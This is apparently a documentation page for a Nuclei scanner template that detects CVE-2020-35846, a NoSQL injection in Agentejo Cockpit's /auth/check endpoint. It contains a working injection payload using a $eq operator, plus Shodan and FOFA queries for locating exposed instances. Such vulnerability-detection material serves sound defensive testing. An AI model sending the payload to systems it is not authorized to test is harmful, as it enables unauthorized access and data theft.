Agentejo Cockpit < 0.11.2 - NoSQL Injection
ID: CVE-2020-35846
Severity: critical
Author: dwisiswant0
Tags: cve,cve2020,nosqli,sqli,cockpit,injection,agentejo
Description
Section titled “Description”Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function. The $eq operator matches documents where the value of a field equals the specified value.
YAML Source
Section titled “YAML Source”id: CVE-2020-35846
info: name: Agentejo Cockpit < 0.11.2 - NoSQL Injection author: dwisiswant0 severity: critical description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function. The $eq operator matches documents where the value of a field equals the specified value. impact: | Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade Agentejo Cockpit to version 0.11.2 or later to mitigate the vulnerability. reference: - https://swarm.ptsecurity.com/rce-cockpit-cms/ - https://nvd.nist.gov/vuln/detail/CVE-2020-35846 - https://getcockpit.com/ - https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466 - https://github.com/agentejo/cockpit/commit/33e7199575631ba1f74cba6b16b10c820bec59af classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-35846 cwe-id: CWE-89 epss-score: 0.82607 epss-percentile: 0.98409 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: agentejo product: cockpit shodan-query: - http.favicon.hash:688609340 - http.html:"cockpit" fofa-query: - icon_hash=688609340 - body="cockpit" tags: cve,cve2020,nosqli,sqli,cockpit,injection,agentejo
http: - method: POST path: - "{{BaseURL}}/auth/check"
body: | { "auth": { "user": { "$eq": "admin" }, "password": [ 0 ] } }
headers: Content-Type: application/json
matchers-condition: and matchers: - type: word part: body words: - "password_verify() expects parameter"
- type: status status: - 200# digest: 4b0a00483046022100d6535070f8b935b3f726b50285cfcc0b07b1f5db3a3b699a927615c4676ae5e1022100831246454d4d26a1082f294759c2d737657fd5c0f56535905e98adfdac7f21d9:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-35846.yaml"